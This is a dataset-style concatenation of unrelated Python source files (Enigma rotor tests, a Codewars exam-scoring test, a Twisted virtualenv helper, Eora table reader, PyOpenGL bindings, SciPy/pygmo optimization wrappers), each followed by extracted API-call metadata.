torch.sigmoid)\n", (5948, 5972), False, 'from monai import transforms, data\n'), ((6102, 6147), 'monai.transforms.Lambdad', 'transforms.Lambdad', (['"""input"""', '(lambda x: x >= 0)'], {}), "('input', lambda x: x >= 0)\n", (6120, 6147), False, 'from monai import transforms, data\n')] |
"""Base class for rotor tests."""
import unittest
from enigma.rotor.reflector import Reflector
from enigma.rotor.rotor import Rotor
class RotorTest(unittest.TestCase):
    """Provides tools for testing rotors."""

    def get_rotor(
        self,
        wiring="EKMFLGDQVZNTOWYHXUSPAIBRCJ",
        ring_setting=1,
        position="A",
        turnover_positions=None,
    ):
        """Return a Rotor object.

        ``turnover_positions`` defaults to ``["R"]``. A ``None`` sentinel
        is used instead of a literal list default so each call gets a
        fresh list (avoids the shared-mutable-default pitfall).
        """
        if turnover_positions is None:
            turnover_positions = ["R"]
        return Rotor(
            wiring=wiring,
            ring_setting=ring_setting,
            position=position,
            turnover_positions=turnover_positions,
        )

    def get_reflector(self, wiring="YRUHQSLDPXNGOKMIEBFZCWVJAT"):
        """Return a Reflector object."""
        return Reflector(wiring=wiring)
| [
"enigma.rotor.reflector.Reflector",
"enigma.rotor.rotor.Rotor"
] | [((429, 538), 'enigma.rotor.rotor.Rotor', 'Rotor', ([], {'wiring': 'wiring', 'ring_setting': 'ring_setting', 'position': 'position', 'turnover_positions': 'turnover_positions'}), '(wiring=wiring, ring_setting=ring_setting, position=position,\n turnover_positions=turnover_positions)\n', (434, 538), False, 'from enigma.rotor.rotor import Rotor\n'), ((715, 739), 'enigma.rotor.reflector.Reflector', 'Reflector', ([], {'wiring': 'wiring'}), '(wiring=wiring)\n', (724, 739), False, 'from enigma.rotor.reflector import Reflector\n')] |
# Created by <NAME>.
# GitHub: https://github.com/ikostan
# LinkedIn: https://www.linkedin.com/in/egor-kostan/
# FUNDAMENTALS ARRAYS NUMBERS BASIC LANGUAGE FEATURES
import unittest
import allure
from utils.log_func import print_log
from kyu_8.check_the_exam.check_exam import check_exam
@allure.epic('8 kyu')
@allure.parent_suite('Beginner')
@allure.suite("Data Structures")
@allure.sub_suite("Unit Tests")
@allure.feature("Lists")
@allure.story('Check the exam')
@allure.tag('FUNDAMENTALS', 'ARRAYS', 'NUMBERS', 'BASIC LANGUAGE FEATURES')
@allure.link(url='https://www.codewars.com/kata/5a3dd29055519e23ec000074/train/python',
            name='Source/Kata')
class CheckExamTestCase(unittest.TestCase):
    """Unit tests for the check_exam function."""

    def test_check_exam(self):
        """Verify check_exam scoring.

        Scoring rules: +4 per correct answer, -1 per incorrect answer,
        +0 per blank answer (empty string).
        """
        allure.dynamic.title("Testing check_exam function")
        allure.dynamic.severity(allure.severity_level.NORMAL)
        allure.dynamic.description_html('<h3>Codewars badge:</h3>'
                                        '<img src="https://www.codewars.com/users/myFirstCode'
                                        '/badges/large">'
                                        '<h3>Test Description:</h3>'
                                        "<p></p>")

        with allure.step("Enter arr1 and arr2 and verify the output"):
            # (correct answers, submitted answers, expected score)
            cases = [
                (["a", "a", "b", "b"], ["a", "c", "b", "d"], 6),
                (["a", "a", "c", "b"], ["a", "a", "b", ""], 7),
                (["a", "a", "b", "c"], ["a", "a", "b", "c"], 16),
                (["b", "c", "b", "a"], ["", "a", "a", "c"], 0),
            ]

            for arr1, arr2, expected in cases:
                print_log(arr1=arr1,
                          arr2=arr2,
                          expected=expected)
                self.assertEqual(expected,
                                 check_exam(arr1, arr2))
| [
"allure.parent_suite",
"allure.tag",
"allure.step",
"kyu_8.check_the_exam.check_exam.check_exam",
"allure.sub_suite",
"allure.dynamic.severity",
"allure.story",
"allure.link",
"allure.dynamic.description_html",
"allure.epic",
"allure.suite",
"allure.dynamic.title",
"allure.feature",
"utils... | [((295, 315), 'allure.epic', 'allure.epic', (['"""8 kyu"""'], {}), "('8 kyu')\n", (306, 315), False, 'import allure\n'), ((317, 348), 'allure.parent_suite', 'allure.parent_suite', (['"""Beginner"""'], {}), "('Beginner')\n", (336, 348), False, 'import allure\n'), ((350, 381), 'allure.suite', 'allure.suite', (['"""Data Structures"""'], {}), "('Data Structures')\n", (362, 381), False, 'import allure\n'), ((383, 413), 'allure.sub_suite', 'allure.sub_suite', (['"""Unit Tests"""'], {}), "('Unit Tests')\n", (399, 413), False, 'import allure\n'), ((415, 438), 'allure.feature', 'allure.feature', (['"""Lists"""'], {}), "('Lists')\n", (429, 438), False, 'import allure\n'), ((440, 470), 'allure.story', 'allure.story', (['"""Check the exam"""'], {}), "('Check the exam')\n", (452, 470), False, 'import allure\n'), ((472, 546), 'allure.tag', 'allure.tag', (['"""FUNDAMENTALS"""', '"""ARRAYS"""', '"""NUMBERS"""', '"""BASIC LANGUAGE FEATURES"""'], {}), "('FUNDAMENTALS', 'ARRAYS', 'NUMBERS', 'BASIC LANGUAGE FEATURES')\n", (482, 546), False, 'import allure\n'), ((548, 663), 'allure.link', 'allure.link', ([], {'url': '"""https://www.codewars.com/kata/5a3dd29055519e23ec000074/train/python"""', 'name': '"""Source/Kata"""'}), "(url=\n 'https://www.codewars.com/kata/5a3dd29055519e23ec000074/train/python',\n name='Source/Kata')\n", (559, 663), False, 'import allure\n'), ((1092, 1143), 'allure.dynamic.title', 'allure.dynamic.title', (['"""Testing check_exam function"""'], {}), "('Testing check_exam function')\n", (1112, 1143), False, 'import allure\n'), ((1152, 1205), 'allure.dynamic.severity', 'allure.dynamic.severity', (['allure.severity_level.NORMAL'], {}), '(allure.severity_level.NORMAL)\n', (1175, 1205), False, 'import allure\n'), ((1214, 1383), 'allure.dynamic.description_html', 'allure.dynamic.description_html', (['"""<h3>Codewars badge:</h3><img src="https://www.codewars.com/users/myFirstCode/badges/large"><h3>Test Description:</h3><p></p>"""'], {}), '(\n \'<h3>Codewars 
badge:</h3><img src="https://www.codewars.com/users/myFirstCode/badges/large"><h3>Test Description:</h3><p></p>\'\n )\n', (1245, 1383), False, 'import allure\n'), ((1560, 1616), 'allure.step', 'allure.step', (['"""Enter arr1 and arr2 and verify the output"""'], {}), "('Enter arr1 and arr2 and verify the output')\n", (1571, 1616), False, 'import allure\n'), ((1977, 2027), 'utils.log_func.print_log', 'print_log', ([], {'arr1': 'arr1', 'arr2': 'arr2', 'expected': 'expected'}), '(arr1=arr1, arr2=arr2, expected=expected)\n', (1986, 2027), False, 'from utils.log_func import print_log\n'), ((2157, 2179), 'kyu_8.check_the_exam.check_exam.check_exam', 'check_exam', (['arr1', 'arr2'], {}), '(arr1, arr2)\n', (2167, 2179), False, 'from kyu_8.check_the_exam.check_exam import check_exam\n')] |
import os.path
from twisted.internet import defer
import pysoup.utils
class Virtualenv(object):
    """Creates a Python virtualenv and runs shell commands inside it.

    All shell work is delegated to ``pysoup.utils.execute_shell_command``,
    which is assumed to return a Deferred firing with the process exit
    code — TODO confirm.
    """
    def __init__(self, display_pip, path):
        # NOTE(review): the parameter name ``display_pip`` looks like a typo
        # for ``display_pipe`` (it is stored as ``_display_pipe``); renaming
        # it would break keyword callers, so it is left as-is.
        self._display_pipe = display_pip
        self._path = path
    @property
    def path(self):
        # Root directory that will contain the ``venv`` subdirectory.
        return self._path
    @property
    def venv_path(self):
        # Directory the virtualenv itself is created in.
        return os.path.join(self._path, 'venv')
    @property
    def source_path(self):
        # Activation script sourced to run commands inside the virtualenv.
        return os.path.join(self.venv_path, 'bin/activate')
    @defer.inlineCallbacks
    def create(self):
        """Create the virtualenv if needed; raises Exception on failure."""
        self._display_pipe.log('Ensuring virtualenv environment at {0}'.format(self._path))
        # NOTE(review): the path is interpolated into the shell string without
        # quoting, so paths containing spaces or shell metacharacters will
        # break — confirm callers only pass safe paths.
        code = yield pysoup.utils.execute_shell_command('mkdir -p {0} && virtualenv --no-site-packages -q {0}'.format(self.venv_path))
        if code != 0:
            self._display_pipe.error('Failed to setup virtualenv at target! ({0})'.format(self._path))
            raise Exception('Could not create virtualenv')
        self._display_pipe.notify('Virtualenv is ready')
    @defer.inlineCallbacks
    def execute_in_venv(self, command):
        """Run ``command`` with the virtualenv activated; yields exit code."""
        code = yield pysoup.utils.execute_shell_command('source {0} && {1}'.format(self.source_path, command))
        defer.returnValue(code)
| [
"twisted.internet.defer.returnValue"
] | [((1169, 1192), 'twisted.internet.defer.returnValue', 'defer.returnValue', (['code'], {}), '(code)\n', (1186, 1192), False, 'from twisted.internet import defer\n')] |
from yggdrasil.metaschema.datatypes import MetaschemaTypeError
from yggdrasil.metaschema.datatypes.MetaschemaType import MetaschemaType
from yggdrasil.metaschema.datatypes.JSONObjectMetaschemaType import (
JSONObjectMetaschemaType)
from yggdrasil.metaschema.properties.ArgsMetaschemaProperty import (
ArgsMetaschemaProperty)
class InstanceMetaschemaType(MetaschemaType):
    r"""Type for evaluating instances of Python classes."""

    name = 'instance'
    description = 'Type for Python class instances.'
    # Schema properties handled by this type: 'class' identifies the Python
    # class, 'args' the keyword arguments used to (re)construct instances.
    properties = ['class', 'args']
    definition_properties = ['class']
    metadata_properties = ['class', 'args']
    extract_properties = ['class', 'args']
    python_types = (object, )
    # Instances are inherently Python objects and cannot be exchanged with
    # models written in other languages.
    cross_language_support = False

    @classmethod
    def validate(cls, obj, raise_errors=False):
        r"""Validate an object to check if it could be of this type.

        Args:
            obj (object): Object to validate.
            raise_errors (bool, optional): If True, errors will be raised when
                the object fails to be validated. Defaults to False.

        Returns:
            bool: True if the object could be of this type, False otherwise.

        """
        # Base not called because every python object should pass validation
        # against the object class
        try:
            # An object is only usable here if its constructor arguments can
            # be recovered from it; instance2args raises otherwise.
            ArgsMetaschemaProperty.instance2args(obj)
            return True
        except MetaschemaTypeError:
            if raise_errors:
                raise ValueError("Class dosn't have an input_args attribute.")
            return False

    @classmethod
    def encode_data(cls, obj, typedef):
        r"""Encode an object's data.

        Args:
            obj (object): Object to encode.
            typedef (dict): Type definition that should be used to encode the
                object.

        Returns:
            string: Encoded object.

        """
        # Serialize the instance as its constructor arguments, encoded as a
        # JSON object (optionally constrained by the 'args' sub-schema).
        args = ArgsMetaschemaProperty.instance2args(obj)
        if isinstance(typedef, dict) and ('args' in typedef):
            typedef_args = {'properties': typedef['args']}
        else:
            typedef_args = None
        return JSONObjectMetaschemaType.encode_data(args, typedef_args)

    @classmethod
    def decode_data(cls, obj, typedef):
        r"""Decode an object.

        Args:
            obj (string): Encoded object to decode.
            typedef (dict): Type definition that should be used to decode the
                object.

        Returns:
            object: Decoded object.

        """
        # TODO: Normalization can be removed if metadata is normalized
        typedef = cls.normalize_definition(typedef)
        args = JSONObjectMetaschemaType.decode_data(
            obj, {'properties': typedef.get('args', {})})
        # Rebuild the instance by calling the class with the decoded
        # keyword arguments.
        return typedef['class'](**args)
| [
"yggdrasil.metaschema.datatypes.JSONObjectMetaschemaType.JSONObjectMetaschemaType.encode_data",
"yggdrasil.metaschema.properties.ArgsMetaschemaProperty.ArgsMetaschemaProperty.instance2args"
] | [((1912, 1953), 'yggdrasil.metaschema.properties.ArgsMetaschemaProperty.ArgsMetaschemaProperty.instance2args', 'ArgsMetaschemaProperty.instance2args', (['obj'], {}), '(obj)\n', (1948, 1953), False, 'from yggdrasil.metaschema.properties.ArgsMetaschemaProperty import ArgsMetaschemaProperty\n'), ((2136, 2192), 'yggdrasil.metaschema.datatypes.JSONObjectMetaschemaType.JSONObjectMetaschemaType.encode_data', 'JSONObjectMetaschemaType.encode_data', (['args', 'typedef_args'], {}), '(args, typedef_args)\n', (2172, 2192), False, 'from yggdrasil.metaschema.datatypes.JSONObjectMetaschemaType import JSONObjectMetaschemaType\n'), ((1331, 1372), 'yggdrasil.metaschema.properties.ArgsMetaschemaProperty.ArgsMetaschemaProperty.instance2args', 'ArgsMetaschemaProperty.instance2args', (['obj'], {}), '(obj)\n', (1367, 1372), False, 'from yggdrasil.metaschema.properties.ArgsMetaschemaProperty import ArgsMetaschemaProperty\n')] |
# Generated by Django 2.1.3 on 2018-12-02 17:52
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration renaming ``Coordinate.ship`` to ``ship1``."""

    dependencies = [
        ('battleships', '0003_auto_20181202_1832'),
    ]

    operations = [
        # Rename the model field; Django renames the underlying column,
        # preserving existing data.
        migrations.RenameField(
            model_name='coordinate',
            old_name='ship',
            new_name='ship1',
        ),
    ]
| [
"django.db.migrations.RenameField"
] | [((231, 318), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""coordinate"""', 'old_name': '"""ship"""', 'new_name': '"""ship1"""'}), "(model_name='coordinate', old_name='ship', new_name=\n 'ship1')\n", (253, 318), False, 'from django.db import migrations\n')] |
import abc
import os
import pandas as pd
import numpy as np
from EoraReader import EoraReader
class PrimaryInputs(EoraReader):
    """Extracts the "Primary Inputs" (value-added) rows of an Eora IO table.

    Relies on state set up by ``EoraReader``: ``self.file``,
    ``self.industry_header``, ``self.industries``, ``self.year`` and
    ``self.country`` — see the base class.
    """
    def __init__(self, file_path):
        super().__init__(file_path)
        self.df = None  # populated by get_dataset()
    def get_dataset(self, extended = False):
        """
        Return a pandas DataFrame of the "Primary Inputs" rows of the
        input-output table, indexed by primary-input name with one column
        per industry. When ``extended`` is True, 'year' and 'country'
        columns are appended.
        """
        value_add_coefficients = []
        primary_inputs = []
        # Number of industry columns, inferred from the table header.
        industry_count = self.industry_header.count("Industries")
        primary_inputs_pos = 0  # NOTE(review): assigned but never used
        line = self.file.readline().strip().split('\t')
        # Skip forward to the first "Primary Inputs" row. NOTE(review): if
        # the marker is absent, readline() eventually returns '' and
        # line[2] raises IndexError — confirm all inputs contain the section.
        while line[2] != "Primary Inputs":
            line = self.file.readline().strip().split('\t')
        # Collect one row per primary input: column 3 holds the name,
        # columns 4..4+industry_count hold the per-industry values.
        while line[2] == "Primary Inputs":
            primary_inputs.append(line[3])
            value_add_coefficients.append(line[4:(4 + industry_count)])
            line = self.file.readline().strip().split('\t')
        numpy_data = np.array(value_add_coefficients)
        df = pd.DataFrame(data = numpy_data, index = primary_inputs)
        df.columns = self.industries[0:industry_count]
        if extended:
            df.loc[:, 'year'] = self.year
            df.loc[:, 'country'] = self.country
        self.df = df
        self.extended = extended
        return df
| [
"pandas.DataFrame",
"numpy.array"
] | [((948, 980), 'numpy.array', 'np.array', (['value_add_coefficients'], {}), '(value_add_coefficients)\n', (956, 980), True, 'import numpy as np\n'), ((994, 1045), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'numpy_data', 'index': 'primary_inputs'}), '(data=numpy_data, index=primary_inputs)\n', (1006, 1045), True, 'import pandas as pd\n')] |
'''OpenGL extension ATI.text_fragment_shader
This module customises the behaviour of the
OpenGL.raw.GL.ATI.text_fragment_shader to provide a more
Python-friendly API
Overview (from the spec)
The ATI_fragment_shader extension exposes a powerful fragment
processing model that provides a very general means of expressing
fragment color blending and dependent texture address modification.
The processing is termed a fragment shader or fragment program and
is specified using a register-based model in which there are fixed
numbers of instructions, texture lookups, read/write registers, and
constants.
ATI_fragment_shader provides a unified instruction set
for operating on address or color data and eliminates the
distinction between the two. That extension provides all the
interfaces necessary to fully expose this programmable fragment
processor in GL.
ATI_text_fragment_shader is a redefinition of the
ATI_fragment_shader functionality, using a slightly different
interface. The intent of creating ATI_text_fragment_shader is to
take a step towards treating fragment programs similar to other
programmable parts of the GL rendering pipeline, specifically
vertex programs. This new interface is intended to appear
similar to the ARB_vertex_program API, within the limits of the
feature set exposed by the original ATI_fragment_shader extension.
The most significant differences between the two extensions are:
(1) ATI_fragment_shader provides a procedural function call
interface to specify the fragment program, whereas
ATI_text_fragment_shader uses a textual string to specify
the program. The fundamental syntax and constructs of the
program "language" remain the same.
(2) The program object management portions of the interface,
namely the routines used to create, bind, and delete program
objects and set program constants are managed
using the framework defined by ARB_vertex_program.
(3) ATI_fragment_shader refers to the description of the
programmable fragment processing as a "fragment shader".
In keeping with the desire to treat all programmable parts
of the pipeline consistently, ATI_text_fragment_shader refers
to these as "fragment programs". The name of the extension is
left as ATI_text_fragment_shader instead of
ATI_text_fragment_program in order to indicate the underlying
similarity between the API's of the two extensions, and to
differentiate it from any other potential extensions that
may be able to move even further in the direction of treating
fragment programs as just another programmable area of the
GL pipeline.
Although ATI_fragment_shader was originally conceived as a
device-independent extension that would expose the capabilities of
future generations of hardware, changing trends in programmable
hardware have affected the lifespan of this extension. For this
reason you will now find a fixed set of features and resources
exposed, and the queries to determine this set have been deprecated
in ATI_fragment_shader. Further, in ATI_text_fragment_shader,
most of these resource limits are fixed by the text grammar and
the queries have been removed altogether.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ATI/text_fragment_shader.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ATI.text_fragment_shader import *
from OpenGL.raw.GL.ATI.text_fragment_shader import _EXTENSION_NAME
def glInitTextFragmentShaderATI():
    """Check whether the ATI_text_fragment_shader extension is available.

    Returns a boolean: True when the current GL implementation
    advertises the extension.
    """
    from OpenGL import extensions
    return extensions.hasGLExtension(_EXTENSION_NAME)
### END AUTOGENERATED SECTION | [
"OpenGL.extensions.hasGLExtension"
] | [((3804, 3846), 'OpenGL.extensions.hasGLExtension', 'extensions.hasGLExtension', (['_EXTENSION_NAME'], {}), '(_EXTENSION_NAME)\n', (3829, 3846), False, 'from OpenGL import extensions\n')] |
import attr
import types
from typing import Union
from enum import Enum
import numpy as np
from scipy.optimize import differential_evolution
import pygmo as pg
class OptimizationMethod(Enum):
    """Enumeration of the optimization solvers this package can drive."""

    # SciPy's differential_evolution solver.
    SCIPY_DE = 1
    # pygmo's self-adaptive DE 1220 algorithm.
    PYGMO_DE1220 = 2
@attr.s(auto_attribs=True)
class ScipyDifferentialEvolutionSettings:
    """
    Optional arguments to pass for SciPy's differential evolution caller.

    Members
    ----------------
    :ivar int number_of_decision_variables:
        Dimensionality of the problem; used to derive a default population
        size when ``popsize`` is not given.
    :ivar str strategy:
        The differential evolution strategy to use. The default is 'best1bin'.
    :ivar float recombination:
        The recombination (crossover probability, CR) constant, in (0, 1].
    :ivar float mutation:
        The mutation constant (differential weight, F), in (0, 2). A
        2-tuple of distinct floats enables dithering.
    :ivar float tol:
        Relative tolerance for convergence.
    :ivar int|numpy.random.RandomState seed:
        Seed or RandomState for repeatable minimizations. Defaults to a
        fresh ``numpy.random.RandomState`` per instance.
    :ivar int workers:
        Number of parallel workers; -1 uses all available CPU cores.
    :ivar bool disp:
        Display status messages during optimization iterations.
    :ivar bool polish:
        If True (default), polish the best population member with
        L-BFGS-B at the end.
    :ivar int popsize:
        Total population size; estimated from the number of decision
        variables when left as None.
    """
    number_of_decision_variables: int
    strategy: str = 'best1bin'
    recombination: float = 0.3
    mutation: float = 0.6
    tol: float = 1e-5
    # attr.Factory fixes a latent bug: a bare `np.random.RandomState()`
    # default is created once at import time and shared by every instance.
    seed: Union[np.random.RandomState, int] = attr.Factory(np.random.RandomState)
    workers: int = 1
    disp: bool = False
    polish: bool = True
    popsize: int = None
    population_size_for_each_variable: int = 15
    total_population_size_limit: int = 100

    def __attrs_post_init__(self):
        """Derive ``popsize`` when absent and validate all settings.

        :raises ValueError:
            For out-of-range popsize, recombination, mutation or tol.
        :raises TypeError:
            For wrongly-typed popsize or mutation.
        """
        if self.popsize is None:
            self.popsize = self._estimate_population_size()
        elif self.popsize <= 0:
            raise ValueError('Number of individuals must be greater than 0.')

        # Deliberately a strict type() check: floats and bools are rejected.
        if type(self.popsize) != int:
            raise TypeError('Population size must be an integer number.')

        if not 0 < self.recombination <= 1:
            raise ValueError('Recombination must be a value between 0 and 1.')

        if type(self.mutation) == tuple:
            # Tuple form enables mutation dithering: exactly two distinct
            # floats inside [0, 2].
            mutation_dithering_array = np.array(self.mutation)
            if len(self.mutation) > 2:
                raise ValueError('Mutation can be a tuple with two numbers, not more.')
            if mutation_dithering_array.min() < 0 or mutation_dithering_array.max() > 2:
                raise ValueError('Mutation must be floats between 0 and 2.')
            elif mutation_dithering_array.min() == mutation_dithering_array.max():
                raise ValueError("Values for mutation dithering can't be equal.")
        else:
            if type(self.mutation) != int and type(self.mutation) != float:
                raise TypeError('When mutation is provided as a single number, it must be a float or an int.')
            if not 0 < self.mutation < 2:
                raise ValueError('Mutation must be a number between 0 and 2.')

        if self.tol < 0:
            raise ValueError('Tolerance must be a positive float.')

    def _estimate_population_size(self):
        """Return a population size proportional to the problem dimension,
        capped at ``total_population_size_limit``."""
        population_size = self.population_size_for_each_variable * self.number_of_decision_variables
        if population_size > self.total_population_size_limit:
            population_size = self.total_population_size_limit
        return population_size
@attr.s(auto_attribs=True)
class PygmoSelfAdaptiveDESettings:
# TODO: docs and validations
gen: int
popsize: int
allowed_variants: list = [2, 6, 7]
variant_adptv: int = 2
ftol: float = 1e-6
xtol: float = 1e-6
memory: bool = True
seed: int = int(np.random.randint(0, 2000))
polish: bool = True
polish_method: str = 'tnewton_precond_restart'
parallel_execution: bool = False
number_of_islands: int = 2
archipelago_gen: int = 50
@attr.s(auto_attribs=True)
class PygmoOptimizationProblemWrapper:
# TODO: docs and validations
objective_function: types.FunctionType
bounds: list
args: list = []
def fitness(self, x):
return [self.objective_function(x, *self.args)]
def get_bounds(self):
return self._transform_bounds_to_pygmo_standard
def gradient(self, x):
return pg.estimate_gradient_h(lambda x: self.fitness(x), x)
@property
def _transform_bounds_to_pygmo_standard(self):
bounds_numpy = np.array(self.bounds, dtype=np.float64)
lower_bounds = list(bounds_numpy[:, 0])
upper_bounds = list(bounds_numpy[:, 1])
return lower_bounds, upper_bounds
@attr.s(auto_attribs=True)
class PygmoSolutionWrapperSerial:
# TODO: docs and validations
solution: pg.core.population
@property
def fun(self):
return self.solution.champion_f
@property
def x(self):
return self.solution.champion_x
@attr.s(auto_attribs=True)
class PygmoSolutionWrapperParallel:
# TODO: docs and validations
champion_x: np.ndarray
champion_f: Union[float, np.float64, np.ndarray]
@property
def fun(self):
return self.champion_f
@property
def x(self):
return self.champion_x
@attr.s(auto_attribs=True)
class OptimizationProblem:
"""
This class stores and solve optimization problems with the available solvers.
"""
# TODO: docs and validations
objective_function: types.FunctionType
bounds: list
optimization_method: OptimizationMethod
solver_args: Union[ScipyDifferentialEvolutionSettings, PygmoSelfAdaptiveDESettings]
args: list = []
def __attrs_post_init__(self):
if self.optimization_method == OptimizationMethod.SCIPY_DE and self.solver_args is None:
self.solver_args = ScipyDifferentialEvolutionSettings(self._number_of_decision_variables)
@property
def _number_of_decision_variables(self):
return len(self.bounds)
def solve_minimization(self):
if self.optimization_method == OptimizationMethod.SCIPY_DE:
result = differential_evolution(
self.objective_function,
bounds=self.bounds,
args=self.args,
strategy=self.solver_args.strategy,
popsize=self.solver_args.popsize,
recombination=self.solver_args.recombination,
mutation=self.solver_args.mutation,
tol=self.solver_args.tol,
disp=self.solver_args.disp,
polish=self.solver_args.polish,
seed=self.solver_args.seed,
workers=self.solver_args.workers
)
return result
elif self.optimization_method == OptimizationMethod.PYGMO_DE1220:
problem_wrapper = PygmoOptimizationProblemWrapper(
objective_function=self.objective_function,
bounds=self.bounds,
args=self.args
)
pygmo_algorithm = pg.algorithm(
pg.de1220(
gen=self.solver_args.gen,
allowed_variants=self.solver_args.allowed_variants,
variant_adptv=self.solver_args.variant_adptv,
ftol=self.solver_args.ftol,
xtol=self.solver_args.xtol,
memory=self.solver_args.memory,
seed=self.solver_args.seed
)
)
pygmo_problem = pg.problem(problem_wrapper)
if self.solver_args.parallel_execution:
solution_wrapper = self._run_pygmo_parallel(
pygmo_algorithm,
pygmo_problem,
number_of_islands=self.solver_args.number_of_islands,
archipelago_gen=self.solver_args.archipelago_gen
)
else:
pygmo_solution = self._run_pygmo_serial(pygmo_algorithm, pygmo_problem)
if self.solver_args.polish:
pygmo_solution = self._polish_pygmo_population(pygmo_solution)
solution_wrapper = PygmoSolutionWrapperSerial(pygmo_solution)
return solution_wrapper
else:
raise NotImplementedError('Unavailable optimization method.')
@staticmethod
def _select_best_pygmo_archipelago_solution(champions_x, champions_f):
best_index = np.argmin(champions_f)
return champions_x[best_index], champions_f[best_index]
def _run_pygmo_parallel(self, algorithm, problem, number_of_islands=2, archipelago_gen=50):
pygmo_archipelago = pg.archipelago(
n=number_of_islands,
algo=algorithm,
prob=problem,
pop_size=self.solver_args.popsize,
seed=self.solver_args.seed
)
pygmo_archipelago.evolve(n=archipelago_gen)
pygmo_archipelago.wait()
champions_x = pygmo_archipelago.get_champions_x()
champions_f = pygmo_archipelago.get_champions_f()
champion_x, champion_f = self._select_best_pygmo_archipelago_solution(champions_x, champions_f)
return PygmoSolutionWrapperParallel(champion_x=champion_x, champion_f=champion_f)
def _run_pygmo_serial(self, algorithm, problem):
population = pg.population(
prob=problem,
size=self.solver_args.popsize,
seed=self.solver_args.seed
)
solution = algorithm.evolve(population)
return solution
def _polish_pygmo_population(self, population):
pygmo_nlopt_wrapper = pg.nlopt(self.solver_args.polish_method)
nlopt_algorithm = pg.algorithm(pygmo_nlopt_wrapper)
solution_wrapper = nlopt_algorithm.evolve(population)
return solution_wrapper
| [
"attr.s",
"pygmo.archipelago",
"scipy.optimize.differential_evolution",
"pygmo.problem",
"pygmo.population",
"numpy.array",
"numpy.random.randint",
"pygmo.algorithm",
"pygmo.de1220",
"numpy.argmin",
"numpy.random.RandomState",
"pygmo.nlopt"
] | [((287, 312), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (293, 312), False, 'import attr\n'), ((4837, 4862), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (4843, 4862), False, 'import attr\n'), ((5322, 5347), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (5328, 5347), False, 'import attr\n'), ((6033, 6058), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (6039, 6058), False, 'import attr\n'), ((6309, 6334), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (6315, 6334), False, 'import attr\n'), ((6616, 6641), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (6622, 6641), False, 'import attr\n'), ((2875, 2898), 'numpy.random.RandomState', 'np.random.RandomState', ([], {}), '()\n', (2896, 2898), True, 'import numpy as np\n'), ((5118, 5144), 'numpy.random.randint', 'np.random.randint', (['(0)', '(2000)'], {}), '(0, 2000)\n', (5135, 5144), True, 'import numpy as np\n'), ((5852, 5891), 'numpy.array', 'np.array', (['self.bounds'], {'dtype': 'np.float64'}), '(self.bounds, dtype=np.float64)\n', (5860, 5891), True, 'import numpy as np\n'), ((9796, 9818), 'numpy.argmin', 'np.argmin', (['champions_f'], {}), '(champions_f)\n', (9805, 9818), True, 'import numpy as np\n'), ((10008, 10141), 'pygmo.archipelago', 'pg.archipelago', ([], {'n': 'number_of_islands', 'algo': 'algorithm', 'prob': 'problem', 'pop_size': 'self.solver_args.popsize', 'seed': 'self.solver_args.seed'}), '(n=number_of_islands, algo=algorithm, prob=problem, pop_size=\n self.solver_args.popsize, seed=self.solver_args.seed)\n', (10022, 10141), True, 'import pygmo as pg\n'), ((10677, 10768), 'pygmo.population', 'pg.population', ([], {'prob': 'problem', 'size': 'self.solver_args.popsize', 'seed': 'self.solver_args.seed'}), '(prob=problem, size=self.solver_args.popsize, seed=self.\n solver_args.seed)\n', (10690, 10768), 
True, 'import pygmo as pg\n'), ((10965, 11005), 'pygmo.nlopt', 'pg.nlopt', (['self.solver_args.polish_method'], {}), '(self.solver_args.polish_method)\n', (10973, 11005), True, 'import pygmo as pg\n'), ((11032, 11065), 'pygmo.algorithm', 'pg.algorithm', (['pygmo_nlopt_wrapper'], {}), '(pygmo_nlopt_wrapper)\n', (11044, 11065), True, 'import pygmo as pg\n'), ((3636, 3659), 'numpy.array', 'np.array', (['self.mutation'], {}), '(self.mutation)\n', (3644, 3659), True, 'import numpy as np\n'), ((7463, 7870), 'scipy.optimize.differential_evolution', 'differential_evolution', (['self.objective_function'], {'bounds': 'self.bounds', 'args': 'self.args', 'strategy': 'self.solver_args.strategy', 'popsize': 'self.solver_args.popsize', 'recombination': 'self.solver_args.recombination', 'mutation': 'self.solver_args.mutation', 'tol': 'self.solver_args.tol', 'disp': 'self.solver_args.disp', 'polish': 'self.solver_args.polish', 'seed': 'self.solver_args.seed', 'workers': 'self.solver_args.workers'}), '(self.objective_function, bounds=self.bounds, args=\n self.args, strategy=self.solver_args.strategy, popsize=self.solver_args\n .popsize, recombination=self.solver_args.recombination, mutation=self.\n solver_args.mutation, tol=self.solver_args.tol, disp=self.solver_args.\n disp, polish=self.solver_args.polish, seed=self.solver_args.seed,\n workers=self.solver_args.workers)\n', (7485, 7870), False, 'from scipy.optimize import differential_evolution\n'), ((8868, 8895), 'pygmo.problem', 'pg.problem', (['problem_wrapper'], {}), '(problem_wrapper)\n', (8878, 8895), True, 'import pygmo as pg\n'), ((8418, 8682), 'pygmo.de1220', 'pg.de1220', ([], {'gen': 'self.solver_args.gen', 'allowed_variants': 'self.solver_args.allowed_variants', 'variant_adptv': 'self.solver_args.variant_adptv', 'ftol': 'self.solver_args.ftol', 'xtol': 'self.solver_args.xtol', 'memory': 'self.solver_args.memory', 'seed': 'self.solver_args.seed'}), '(gen=self.solver_args.gen, allowed_variants=self.solver_args.\n 
allowed_variants, variant_adptv=self.solver_args.variant_adptv, ftol=\n self.solver_args.ftol, xtol=self.solver_args.xtol, memory=self.\n solver_args.memory, seed=self.solver_args.seed)\n', (8427, 8682), True, 'import pygmo as pg\n')] |
# MIT License
#
# Copyright (c) 2021 TrigonDev
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
